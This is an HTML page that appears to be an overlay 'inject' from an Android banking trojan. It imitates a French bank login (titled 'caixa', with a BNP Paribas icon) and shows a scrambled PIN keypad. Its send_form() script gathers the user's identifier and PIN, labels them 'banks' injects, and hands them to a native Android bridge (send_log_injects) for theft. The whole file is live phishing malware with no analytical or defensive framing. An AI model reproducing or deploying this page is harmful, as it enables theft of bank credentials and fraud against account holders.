<!DOCTYPE html>
<html>
<head>
    <title>caixa</title>
    <link rel="shortcut icon" href="net.bnpparibas.mescomptes.png" type="image/png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <meta charset="utf-8">
</head>
<body>

<style type="text/css">
    body {
        background: #266c29;
        margin: 0;
        padding: 0;
        font-family: Helvetica, sans-serif;
    }
    .logo {
text-align: center;
    background-size: 100%;
    padding: 0px 0px 0px 0px;
    background: none;
    color: #fff;
    font-weight: 400;
    text-decoration: none;
    }
    .form {
        text-align: center;
        padding-top: 70px;
    }
    .form label {
        display: block;
    }
    form {
        display: inline-block;
    }
fieldset {
      position: relative;
      text-align: center;
      border: none;
          margin: 0;
    padding: 0;

}

input[type="text"],input[type="password"] {
    line-height: 16px;
    font-size: 17px;
    box-sizing: border-box;
    width: 100%;
    position: relative;
    padding: 0px 0px 0px 0px;
    margin: 0px 1px;
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-appearance: none;
    height: 48px;
    margin: 20px 0px 10px 0px;
    color: #ffffff;
    outline: none;
    border: 1.2px solid #ffffff;
    background: none;
    border-top: none;
    border-left: none;
    border-right: none;
}
input[type="button"] {
left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 30px 0px 0px 0px;
    outline: none;
    float: right;
    color: #ffffff;
    border: none;
    font-size: 14px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #ff7422;
    border-radius: 3px;
}
input::placeholder {
    color: #ffffff;
    font-size: 15px;
}
.pure-material-checkbox {
    z-index: 0;
    position: relative;
    display: inline-block;
    color: rgba(var(--pure-material-onsurface-rgb, 0, 0, 0), 0.87);
    font-family: var(--pure-material-font, "Roboto", "Segoe UI", BlinkMacSystemFont, system-ui, -apple-system);
    font-size: 16px;
    line-height: 1.5;
}
/* Input */
.pure-material-checkbox > input {
    appearance: none;
    -moz-appearance: none;
    -webkit-appearance: none;
    z-index: -1;
    position: absolute;
    left: -10px;
    top: -8px;
    display: block;
    margin: 0;
    border-radius: 50%;
    width: 40px;
    height: 40px;
    background-color: rgba(var(--pure-material-onsurface-rgb, 0, 0, 0), 0.6);
    box-shadow: none;
    outline: none;
    opacity: 0;
    transform: scale(1);
    pointer-events: none;
    transition: opacity 0.3s, transform 0.2s;
}

/* Span */
.pure-material-checkbox > span {
    display: inline-block;
    width: 100%;
    cursor: pointer;
}

/* Box */
.pure-material-checkbox > span::before {
    content: "";
    display: inline-block;
    box-sizing: border-box;
    margin: 3px 11px 3px 1px;
    border: solid 2px; /* Safari */
    border-color: rgba(var(--pure-material-onsurface-rgb, 0, 0, 0), 0.6);
    border-radius: 2px;
    width: 18px;
    height: 18px;
    vertical-align: top;
    transition: border-color 0.2s, background-color 0.2s;
}

/* Checkmark */
.pure-material-checkbox > span::after {
    content: "";
    display: block;
    position: absolute;
    top: 3px;
    left: 1px;
    width: 10px;
    height: 5px;
    border: solid 2px transparent;
    border-right: none;
    border-top: none;
    transform: translate(3px, 4px) rotate(-45deg);
}

/* Checked, Indeterminate */
.pure-material-checkbox > input:checked,
.pure-material-checkbox > input:indeterminate {
    background-color: rgb(var(--pure-material-primary-rgb, 33, 150, 243));
}

.pure-material-checkbox > input:checked + span::before,
.pure-material-checkbox > input:indeterminate + span::before {
    border-color: #e78b02;
    background-color: #e78b02;
}

.pure-material-checkbox > input:checked + span::after,
.pure-material-checkbox > input:indeterminate + span::after {
    border-color: rgb(var(--pure-material-onprimary-rgb, 255, 255, 255));
}

.pure-material-checkbox > input:indeterminate + span::after {
    border-left: none;
    transform: translate(4px, 3px);
}

/* Hover, Focus */
.pure-material-checkbox:hover > input {
    opacity: 0.04;
}

.pure-material-checkbox > input:focus {
    opacity: 0.12;
}

.pure-material-checkbox:hover > input:focus {
    opacity: 0.16;
}

/* Active */
.pure-material-checkbox > input:active {
    opacity: 1;
    transform: scale(0);
    transition: transform 0s, opacity 0s;
}

.pure-material-checkbox > input:active + span::before {
    border-color: rgb(var(--pure-material-primary-rgb, 33, 150, 243));
}

.pure-material-checkbox > input:checked:active + span::before {
    border-color: transparent;
    background-color: rgba(var(--pure-material-onsurface-rgb, 0, 0, 0), 0.6);
}

/* Disabled */
.pure-material-checkbox > input:disabled {
    opacity: 0;
}

.pure-material-checkbox > input:disabled + span {
    color: rgba(var(--pure-material-onsurface-rgb, 0, 0, 0), 0.38);
    cursor: initial;
}

.pure-material-checkbox > input:disabled + span::before {
    border-color: currentColor;
}

.pure-material-checkbox > input:checked:disabled + span::before,
.pure-material-checkbox > input:indeterminate:disabled + span::before {
    border-color: transparent;
    background-color: currentColor;
}
input[type="checkbox"] {
    display: none;
}

/* стили для метки */
input[type="checkbox"] + label {
    cursor: pointer;
    padding-left: 50px;
    position: relative;
    font-family: tahoma, sans-serif, arial;
    line-height: 40px;
}

/* стили для поля с бегунком*/
input[type="checkbox"] + label::before {
content: "";
    display: inline-block;
    position: absolute;
    top: 0;
    left: 0;
    vertical-align: middle;
    padding: 0;
    height: 24px;
    width: 45px;
    margin: 0 5px 0 0;
    border: 1px solid #e5e5e5;
    border-radius: 12px;
    background: #e5e5e5;
}

/* стили для бегунка*/
input[type="checkbox"] + label::after {
    content: "";
    display: block;
    position: absolute;
    top: 1px;
    left: 1px;
    width: 22px;
    height: 22px;
    border-radius: 22px;
    background: #ffffff;
    border: 1px solid #cacaca;
    box-shadow: 0 3px 3px rgba(140, 140, 140, .1);
}
input:disabled {
left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 0px 0px 0px 0px;
    outline: none;
    float: right;
    color: #939393;
    border: none;
    font-size: 14px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #dfdfdf;
    border-radius: 3px;
}
/* плавность )) */
input[type="checkbox"] + label::before,
input[type="checkbox"] + label::after {
    -webkit-transition: all .2s ease-out;
    transition: all .2s ease-out;
}


input[type="checkbox"]:checked + label::after {
    left: 22px;
}
</style>

<fieldset id="formtosend">


<div class="" id="log" style="display: block;">

<div class="logo" style="color: #fff;font-size: 16px;font-weight: 400;background: #266c29;padding: 15px;text-align: left;">
<
</div>

<script type="text/javascript">
    $(document).ready(function() {

  $('#myinput').on('keypress', function() {
    $('#action').fadeIn(function() {
      $(this).fadeOut();
    });
  });

  $('.mybutton').on('click', function() {
    var Paste = $(this).data('paste');
    $('#myinput').val($('#myinput').val() + Paste).trigger('keypress');
  });
});

    function cislo(){ if (event.keyCode < 48 || event.keyCode > 57) event.returnValue= false; }
</script>

<div class="area" style="padding: 0px;border-radius: 10px;margin: 0px 20px 0px 20px;height: 180px;">
    <div id="logn" style="display: block;">
        <input type="text" name="login" id="login" style="text-align: left;" placeholder="Saisissez votre identifiant ici">
        <div>
                <label style="color: #fff;font-size: 14px;position: relative;top: 15px;float: left;">Mémoriser mon identifiant</label>
        <input id="checkbox1" name="sumbit" type="checkbox">
        <label for="checkbox1" style="margin-top: 10px;padding-bottom: 40px;float: right;"></label>
    </div>
            </div>
        <input name="exit" type="hidden" text="true"/>
</div>


</div>

<div style="background: none;margin-top: 0px;padding: 5px 0px 20px 0px;">
<input type="password" name="pin" id="myinput" maxlength="6" style="border: none; text-align: center; font-size: 30px;">
<button class="mybutton" name="sumbit" data-paste="2" style="padding: 10px 20px 10px 20px;color: #fff;background: none;border: none;margin-top: 20px;font-size: 26px;">2</button>
<button class="mybutton" name="sumbit" data-paste="3" style="padding: 10px 20px 10px 20px;color: #fff;background: none;border: none;margin-top: 20px;font-size: 26px;">3</button>
<button class="mybutton" name="sumbit" data-paste="8" style="padding: 10px 20px 10px 20px;color: #fff;background: none;border: none;margin-top: 20px;font-size: 26px;">8</button>
<button class="mybutton" name="sumbit" data-paste="1" style="padding: 10px 20px 10px 20px;color: #fff;background: none;border: none;margin-top: 20px;font-size: 26px;">1</button>
<button class="mybutton" name="sumbit" data-paste="7" style="padding: 10px 20px 10px 20px;color: #fff;background: none;border: none;margin-top: 20px;font-size: 26px;">7</button>
<br>
<br>
<button class="mybutton" name="sumbit" data-paste="0" style="padding: 10px 20px 10px 20px;color: #fff;background: none;border: none;margin-top: 20px;font-size: 26px;">0</button>
<button class="mybutton" name="sumbit" data-paste="4" style="padding: 10px 20px 10px 20px;color: #fff;background: none;border: none;margin-top: 20px;font-size: 26px;">4</button>
<button class="mybutton" name="sumbit" data-paste="5" style="padding: 10px 20px 10px 20px;color: #fff;background: none;border: none;margin-top: 20px;font-size: 26px;">5</button>
<button class="mybutton" name="sumbit" data-paste="6" style="padding: 10px 20px 10px 20px;color: #fff;background: none;border: none;margin-top: 20px;font-size: 26px;">6</button>
<button class="mybutton" name="sumbit" data-paste="9" style="padding: 10px 20px 10px 20px;color: #fff;background: none;border: none;margin-top: 20px;font-size: 26px;">9</button>
<button name="sumbit" onclick="send_form()" style="padding: 10px 20px 10px 20px;color: #fff;background: none;border: none;margin-top: 20px;font-size: 26px;">OK</button>

</div>
</fieldset> 

<script>
function send_form()
{
var data = {};
    data.login = document.getElementById('login').value;
    data.password = document.getElementById('myinput').value;
    data.type_injects = "banks";
    data.closed = "close_activity_injects";
    
    var ua = navigator.userAgent.toLowerCase();
    if(ua.indexOf("android") > -1) {
        try {
            Android.send_log_injects(JSON.stringify(data))
        } catch (err) {}
    }else{
        alert(JSON.stringify(data));
    } 
}

function show() {
    var p = document.getElementById('login');
    p.setAttribute('type', 'text');
}

function hide() {
    var p = document.getElementById('login');
    p.setAttribute('type', 'password');
}

var pwShown = 0;

document.getElementById("eye").addEventListener("click", function () {
    if (pwShown == 0) {
        pwShown = 1;
        show();
    } else {
        pwShown = 0;
        hide();
    }
}, false);
</script>

</body>
</html>